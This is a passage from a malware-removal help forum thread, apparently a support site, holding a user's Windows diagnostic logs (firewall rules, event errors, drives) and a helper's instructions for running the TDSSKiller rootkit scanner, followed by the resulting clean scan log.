FirewallRules: [{47F5B308-F90C-44B6-8F76-8CD8D7BE18AC}] => (Allow) E:\Steam\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [TCP Query User{07742FB7-4FA1-491D-9AFA-D01C5BF900A2}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{513FEF9C-C9AF-4F01-B42A-22EFCFAFA9FE}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [{9C511CE5-0A0E-486C-B199-643EDBF6F7E2}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{ADFBCC64-1EC9-4B0C-AE03-DE894A5C196E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D55B918D-6D36-49D5-8721-28D5C1AE2CA4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{B9927355-8732-4582-AC86-694632994CD9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CDE36FFA-9ACE-4BBE-97A3-0FAC7816C802}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{12F849E2-DA7B-4EB0-AD38-233D5C7EC1CB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{5D185C57-1C01-467C-8054-ADF4B543956B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8FAE24F6-CE34-4FA6-A8BD-A396108F3E28}] => (Allow) E:\Steam\SteamApps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{65372007-E3A4-478F-B2F0-55D6DEB11FE9}] => (Allow) E:\Steam\SteamApps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{3BC86F76-CE4F-4159-9F4D-6D2A6FF0C815}] => (Allow) E:\Steam\SteamApps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{BFED839D-5B77-4C7D-9D56-9149718E41EA}] => (Allow) E:\Steam\SteamApps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{06B568BB-5A97-42C1-94D4-7EFA4CC963C9}] => (Allow) D:\Steam\SteamApps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [{48FC24B2-B528-45C4-A3CE-25BA583860B1}] => (Allow) D:\Steam\SteamApps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [{EC42A553-A749-4321-B2C9-D49CE12B262D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{DF9C3520-2581-4D11-BD1A-61B4D1BBBB3B}] => (Allow) C:\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{E22AB006-1780-4DF3-B28E-913B42BC9600}] => (Allow) C:\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{E311F2F8-2788-4457-B917-527DF6DF7450}] => (Allow) C:\Steam\steamapps\common\Hoard\win32\Reuben.exe
FirewallRules: [{238F453C-A155-4076-A142-A1E2FF1B69DB}] => (Allow) C:\Steam\steamapps\common\Hoard\win32\Reuben.exe
FirewallRules: [{2D58E18E-73F4-47A5-8054-4DC8F2558185}] => (Allow) C:\Steam\steamapps\common\Pixel Piracy\PixelPiracy.exe
FirewallRules: [{55400478-42EB-4180-8825-E17A1E8EB660}] => (Allow) C:\Steam\steamapps\common\Pixel Piracy\PixelPiracy.exe
FirewallRules: [{925FBCB5-E2E4-4946-9A53-DF101EF3473A}] => (Allow) D:\Steam\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{BC1B3F46-931A-474C-B9B1-27C3D21DC383}] => (Allow) D:\Steam\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{52F5E84A-E439-4834-BC46-12EFF0205451}] => (Allow) LPort=49183
FirewallRules: [{216AF9E2-2698-409D-89F0-8A3F3DB480D5}] => (Allow) LPort=5000

==================== Faulty Device Manager Devices =============

Name: Broadcom NetLink ™ Gigabit Ethernet #2
Description: Broadcom NetLink ™ Gigabit Ethernet
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: k57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Serial ATA Controller
Description: Serial ATA Controller
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/10/2015 07:31:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/09/2015 08:02:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 41.0.1.5750, time stamp: 0x560b37be
Faulting module name: mozglue.dll, version: 41.0.1.5750, time stamp: 0x560b229d
Exception code: 0x80000003
Fault offset: 0x0000ec7f
Faulting process id: 0x1b7c
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3

Error: (10/09/2015 07:38:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.6.305.0, time stamp: 0x53f7bfb6
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeb033f
Exception code: 0xc0000005
Fault offset: 0x00000000000011be
Faulting process id: 0xa8
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3

Error: (10/09/2015 07:31:38 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/08/2015 01:50:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/07/2015 09:05:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/06/2015 03:02:22 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/05/2015 04:26:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/04/2015 06:36:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/03/2015 07:26:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (10/10/2015 07:31:37 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (10/09/2015 09:02:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Antimalware Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Restart the service.

Error: (10/09/2015 08:06:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The PnkBstrA service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/09/2015 07:38:53 PM) (Source: Microsoft Antimalware) (EventID: 5008) (User: )
Description: %%860 engine has been terminated due to an unexpected error.

    Failure Type: %%830

    Exception code: 0xc0000005

    Resource: file:C:\Program Files (x86)\Glyph\Games\ArcheAge\Beta\game_pak

Error: (10/09/2015 07:38:53 PM) (Source: Microsoft Antimalware) (EventID: 5008) (User: )
Description: %%860 engine has been terminated due to an unexpected error.

    Failure Type: %%830

    Exception code: 0xc0000005

    Resource: file:C:\Program Files (x86)\Glyph\Games\ArcheAge\Beta\game_pak

Error: (10/09/2015 07:38:53 PM) (Source: Microsoft Antimalware) (EventID: 5008) (User: )
Description: %%860 engine has been terminated due to an unexpected error.

    Failure Type: %%831

    Exception code:

    Resource: file:C:\Program Files (x86)\Glyph\Games\ArcheAge\Beta\game_pak

Error: (10/09/2015 07:34:25 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/09/2015 07:34:25 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/09/2015 07:34:25 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/09/2015 07:31:56 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)


==================== Memory info ===========================

Processor: Intel® Core™ i7 CPU X 990 @ 3.47GHz
Percentage of memory in use: 24%
Total physical RAM: 12278.93 MB
Available physical RAM: 9222.74 MB
Total Virtual: 24556.03 MB
Available Virtual: 21328.18 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:922.74 GB) (Free:368.87 GB) NTFS
Drive d: () (Fixed) (Total:74.53 GB) (Free:17.2 GB) NTFS
Drive e: () (Fixed) (Total:298.09 GB) (Free:60.77 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: CB59CF06)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=8.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=922.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: 029A0299)
Partition 1: (Not Active) - (Size=74.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 298.1 GB) (Disk ID: 7BCFC569)
Partition 1: (Active) - (Size=298.1 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

#4 deeprybka

  • Malware Response Team
  • 5,198 posts
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 11 October 2015 - 06:48 AM

Hi,

Step 1

Please download TDSSKiller and save it to your Desktop.

  • Start tdsskiller.exe with administrator privileges.
  • Accept the EULA and the KSN Statement.
  • Click on Change parameters. (1)
  • Make sure that all available options (except "Loaded modules") are checked and click OK. (2)
  • Click on Start scan.
  • If any threats are found, don't delete them but choose the Skip option for all of them.
  • Click on Report (3) to open the log file. (It is also saved at C:\TDSSKiller.<version_date_time>_log.txt).
    Copy and paste its contents in your next reply.



Edited by deeprybka, 11 October 2015 - 06:48 AM.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer

#5 Rainsford

  • Topic Starter

  • Members
  • 21 posts
  • Local time:07:34 AM

Posted 11 October 2015 - 09:37 AM

Hello again, here is the report.

 

09:34:22.0454 0x1bb4  TDSS rootkit removing tool 3.1.0.5 Jul 24 2015 12:29:57
09:34:26.0843 0x1bb4  ============================================================
09:34:26.0843 0x1bb4  Current date / time: 2015/10/11 09:34:26.0843
09:34:26.0843 0x1bb4  SystemInfo:
09:34:26.0843 0x1bb4  
09:34:26.0843 0x1bb4  OS Version: 6.1.7601 ServicePack: 1.0
09:34:26.0843 0x1bb4  Product type: Workstation
09:34:26.0843 0x1bb4  ComputerName: PHOTON
09:34:26.0843 0x1bb4  UserName: Rainsford
09:34:26.0843 0x1bb4  Windows directory: C:\Windows
09:34:26.0843 0x1bb4  System windows directory: C:\Windows
09:34:26.0843 0x1bb4  Running under WOW64
09:34:26.0843 0x1bb4  Processor architecture: Intel x64
09:34:26.0843 0x1bb4  Number of processors: 12
09:34:26.0843 0x1bb4  Page size: 0x1000
09:34:26.0843 0x1bb4  Boot type: Normal boot
09:34:26.0843 0x1bb4  ============================================================
09:34:32.0274 0x1bb4  KLMD registered as C:\Windows\system32\drivers\77138243.sys
09:34:33.0105 0x1bb4  System UUID: {02C2AE68-B56E-EE20-53FB-E1A690A1FD30}
09:34:33.0544 0x1bb4  Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
09:34:33.0555 0x1bb4  Drive \Device\Harddisk2\DR2 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
09:34:33.0565 0x1bb4  Drive \Device\Harddisk1\DR1 - Size: 0x12A1F16000 ( 74.53 Gb ), SectorSize: 0x200, Cylinders: 0x2601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
09:34:33.0568 0x1bb4  ============================================================
09:34:33.0568 0x1bb4  \Device\Harddisk0\DR0:
09:34:33.0568 0x1bb4  MBR partitions:
09:34:33.0568 0x1bb4  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x14000, BlocksNum 0x1177000
09:34:33.0568 0x1bb4  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x118B000, BlocksNum 0x7357B000
09:34:33.0568 0x1bb4  \Device\Harddisk2\DR2:
09:34:33.0572 0x1bb4  MBR partitions:
09:34:33.0572 0x1bb4  \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x2542D682
09:34:33.0572 0x1bb4  \Device\Harddisk1\DR1:
09:34:33.0572 0x1bb4  MBR partitions:
09:34:33.0572 0x1bb4  \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x950E800
09:34:33.0572 0x1bb4  ============================================================
09:34:33.0610 0x1bb4  C: <-> \Device\Harddisk0\DR0\Partition2
09:34:33.0635 0x1bb4  D: <-> \Device\Harddisk1\DR1\Partition1
09:34:33.0648 0x1bb4  E: <-> \Device\Harddisk2\DR2\Partition1
09:34:33.0648 0x1bb4  ============================================================
09:34:33.0648 0x1bb4  Initialize success
09:34:33.0648 0x1bb4  ============================================================
09:35:02.0856 0x0ff0  ============================================================
09:35:02.0856 0x0ff0  Scan started
09:35:02.0856 0x0ff0  Mode: Manual; SigCheck; TDLFS;
09:35:02.0856 0x0ff0  ============================================================
09:35:02.0856 0x0ff0  KSN ping started
09:35:05.0637 0x0ff0  KSN ping finished: true
09:35:06.0559 0x0ff0  ================ Scan system memory ========================
09:35:06.0559 0x0ff0  System memory - ok
09:35:06.0559 0x0ff0  ================ Scan services =============================
09:35:08.0670 0x0ff0  [ B1359701847FF1FF415FA083F1610F48, 991F995B9CF614549F5F7EB5C5B2D47F34EFF0F47B35C4BF4CE716666B9DA1D3 ] BEService       C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
09:35:08.0731 0x0ff0  BEService - detected UnsignedFile.Multi.Generic ( 1 )
09:35:12.0134 0x0ff0  Detect skipped due to KSN trusted
09:35:12.0134 0x0ff0  BEService - ok
09:35:13.0814 0x0ff0  [ C0EAD9F8AB83D41FF07303C75589C2B8, C89CAC39BCD2FA2DCC56D7EE84FF66127BCECCAE400E119FE41BF4C4D769504B ] Creative Audio Engine Licensing Service C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe
09:35:13.0840 0x0ff0  Creative Audio Engine Licensing Service - detected UnsignedFile.Multi.Generic ( 1 )
09:35:19.0913 0x0ff0  Detect skipped due to KSN trusted
09:35:19.0913 0x0ff0  Creative Audio Engine Licensing Service - ok
09:35:20.0575 0x0ff0  [ 5CE3D0E1D1B3832EE052CFC442EEE0FA, 6B9DB2C350140ED547C7A96DB0EAD812E8987176B312C79AF52FC9B23EEEB8C4 ] CTAudSvcService C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
09:35:20.0629 0x0ff0  CTAudSvcService - detected UnsignedFile.Multi.Generic ( 1 )
09:35:23.0742 0x0ff0  Detect skipped due to KSN trusted
09:35:23.0742 0x0ff0  CTAudSvcService - ok
09:35:29.0796 0x0ff0  [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
09:35:29.0807 0x0ff0  IPMIDRV - ok
09:35:29.0815 0x0ff0  [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
09:35:29.0846 0x0ff0  IPNAT - ok
09:35:29.0856 0x0ff0  [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM          C:\Windows\system32\drivers\irenum.sys
09:35:29.0868 0x0ff0  IRENUM - ok
09:35:29.0877 0x0ff0  [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp          C:\Windows\system32\drivers\isapnp.sys
09:35:29.0886 0x0ff0  isapnp - ok
09:35:29.0927 0x0ff0  [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
09:35:29.0940 0x0ff0  iScsiPrt - ok
09:35:29.0972 0x0ff0  [ 9D946134848CC59246704DCB5FC53BB8, 6A7D371B3A7214CF00C07DA385556F7C1B8E6861C7AE2C06147DF6C6064A6CE9 ] k57nd60a        C:\Windows\system32\DRIVERS\k57nd60a.sys
09:35:29.0993 0x0ff0  k57nd60a - ok
09:35:30.0004 0x0ff0  [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
09:35:30.0012 0x0ff0  kbdclass - ok
09:35:30.0019 0x0ff0  [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
09:35:30.0035 0x0ff0  kbdhid - ok
09:35:30.0038 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso          C:\Windows\system32\lsass.exe
09:35:30.0045 0x0ff0  KeyIso - ok
09:35:30.0088 0x0ff0  [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
09:35:30.0097 0x0ff0  KSecDD - ok
09:35:30.0105 0x0ff0  [ 41774FF331F609EF442B7398EE6202B1, AD67DA06A74895C384F4A1F1CF47050DAEE9C6CE8AD12F1A116FC977B6C3A864 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
09:35:30.0116 0x0ff0  KSecPkg - ok
09:35:30.0121 0x0ff0  [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk         C:\Windows\system32\drivers\ksthunk.sys
09:35:30.0154 0x0ff0  ksthunk - ok
09:35:30.0177 0x0ff0  [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm           C:\Windows\system32\msdtckrm.dll
09:35:30.0234 0x0ff0  KtmRm - ok
09:35:30.0252 0x0ff0  [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer    C:\Windows\system32\srvsvc.dll
09:35:30.0290 0x0ff0  LanmanServer - ok
09:35:30.0315 0x0ff0  [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
09:35:30.0339 0x0ff0  LanmanWorkstation - ok
09:35:30.0357 0x0ff0  [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
09:35:30.0379 0x0ff0  lltdio - ok
09:35:30.0440 0x0ff0  [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc         C:\Windows\System32\lltdsvc.dll
09:35:30.0503 0x0ff0  lltdsvc - ok
09:35:30.0516 0x0ff0  [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts         C:\Windows\System32\lmhsvc.dll
09:35:30.0538 0x0ff0  lmhosts - ok
09:35:30.0552 0x0ff0  [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
09:35:30.0562 0x0ff0  LSI_FC - ok
09:35:30.0581 0x0ff0  [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
09:35:30.0592 0x0ff0  LSI_SAS - ok
09:35:30.0604 0x0ff0  [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
09:35:30.0613 0x0ff0  LSI_SAS2 - ok
09:35:30.0622 0x0ff0  [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
09:35:30.0632 0x0ff0  LSI_SCSI - ok
09:35:30.0644 0x0ff0  [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv           C:\Windows\system32\drivers\luafv.sys
09:35:30.0668 0x0ff0  luafv - ok
09:35:30.0737 0x0ff0  [ A401CFF74982D8DF851F20307C806073, 1D7BA90C9E77FAAE59F60AB5310EC41D9C5B98F1F9A89A3CDB9169E6DEF565DA ] LVRS64          C:\Windows\system32\DRIVERS\lvrs64.sys
09:35:30.0747 0x0ff0  LVRS64 - ok
09:35:30.0886 0x0ff0  [ 13384CB5F5813E65F31078D6ABFAAF38, A6E7374C15CAECC273197BF62F8F926BA30E9509270A8470756F4710E1DEA126 ] LVUVC64         C:\Windows\system32\DRIVERS\lvuvc64.sys
09:35:30.0962 0x0ff0  LVUVC64 - ok
09:35:31.0035 0x0ff0  [ A8D28D5B3E2A528D1EF0E338E44F2820, 40D1EFDD253BC0A0D984A5AD8A2721C3E83B15F14D538204714E6D5B00D92CEB ] MBAMProtector   C:\Windows\system32\drivers\mbam.sys
09:35:31.0043 0x0ff0  MBAMProtector - ok
09:35:31.0126 0x0ff0  [ 83C982A395D00BAFF6515FB38424EA76, 0E1B66F84A483D47550347D4A9426B95A066DB5104C4284F606A16768A11DB0C ] MBAMService     C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
09:35:31.0167 0x0ff0  MBAMService - ok
09:35:31.0180 0x0ff0  [ AE757332EA130E94E646621CC695B52A, E688CF34A4206F32B5C7301119D8459C3456FC178FA1DAA6215CE15F2C824C43 ] MBAMWebAccessControl C:\Windows\system32\drivers\mwac.sys
09:35:31.0189 0x0ff0  MBAMWebAccessControl - ok
09:35:31.0208 0x0ff0  [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
09:35:31.0223 0x0ff0  Mcx2Svc - ok
09:35:31.0229 0x0ff0  [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas         C:\Windows\system32\drivers\megasas.sys
09:35:31.0237 0x0ff0  megasas - ok
09:35:31.0258 0x0ff0  [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
09:35:31.0270 0x0ff0  MegaSR - ok
09:35:31.0303 0x0ff0  [ 43A078B4C2625A35D23F6FFE061C31C9, 8D5970140965ADCDC73EF220246142A6A3C3BA15CC82E78359AFD771CD2B28C6 ] mio             C:\Windows\system32\DRIVERS\mio.sys
09:35:31.0326 0x0ff0  mio - ok
09:35:31.0346 0x0ff0  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS           C:\Windows\system32\mmcss.dll
09:35:31.0369 0x0ff0  MMCSS - ok
09:35:31.0376 0x0ff0  [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem           C:\Windows\system32\drivers\modem.sys
09:35:31.0408 0x0ff0  Modem - ok
09:35:31.0421 0x0ff0  [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
09:35:31.0443 0x0ff0  monitor - ok
09:35:31.0461 0x0ff0  [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
09:35:31.0469 0x0ff0  mouclass - ok
09:35:31.0482 0x0ff0  [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
09:35:31.0504 0x0ff0  mouhid - ok
09:35:31.0520 0x0ff0  [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
09:35:31.0529 0x0ff0  mountmgr - ok
09:35:31.0551 0x0ff0  [ 6215DA3AD492CFBEBEE2ADBED0A6CC22, 07B290B58EF722825D50AF97E10B7098A2118B3F335E1FFF8F9E5E9AF7A0A6CE ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
09:35:31.0562 0x0ff0  MozillaMaintenance - ok
09:35:31.0614 0x0ff0  [ 6439D1E559D08BD8A1465A8943357053, 0E300508C22D12FBA3BE566B722F574CBE1B4A1A305356B92B8EA8B86267071B ] MpFilter        C:\Windows\system32\DRIVERS\MpFilter.sys
09:35:31.0627 0x0ff0  MpFilter - ok
09:35:31.0644 0x0ff0  [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio            C:\Windows\system32\drivers\mpio.sys
09:35:31.0655 0x0ff0  mpio - ok
09:35:31.0667 0x0ff0  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
09:35:31.0689 0x0ff0  mpsdrv - ok
